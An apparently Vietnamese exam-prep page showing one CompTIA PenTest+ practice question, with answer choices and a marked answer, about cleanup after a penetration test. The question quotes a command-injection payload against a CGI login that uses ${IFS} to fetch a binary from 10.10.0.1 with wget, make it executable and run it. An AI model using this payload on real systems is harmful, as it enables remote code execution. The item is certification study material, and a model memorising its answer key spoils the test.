CertyRush
Đang tải...
C CertyRush
Câu hỏi free preview

Câu 8: PT1-002: CompTIA PenTest+ Certification Exam

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = `POST ` exploit += `/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} `" c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${…

Nội dung câu hỏi

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = `POST ` exploit += `/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} `" c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a`exploit += `HTTP/1.1`Which of the following commands should the penetration tester run post-engagement?

Các lựa chọn

Đáp án được giữ gọn theo nhãn A, B, C, D trong phần bình chọn tương tác.

  1. A. grep ג€"v apache ~/.bash_history > ~/.bash_history
  2. B. rm ג€"rf /tmp/apache — đáp án hiện tại
  3. C. chmod 600 /tmp/apache
  4. D. taskkill /IM ג€apacheג€ /F

Cộng đồng

0 bình luận công khai. Tên thành viên được ẩn một phần.

Chưa có bình luận. Mở giao diện tương tác để bắt đầu thảo luận.

Câu hỏi liền kề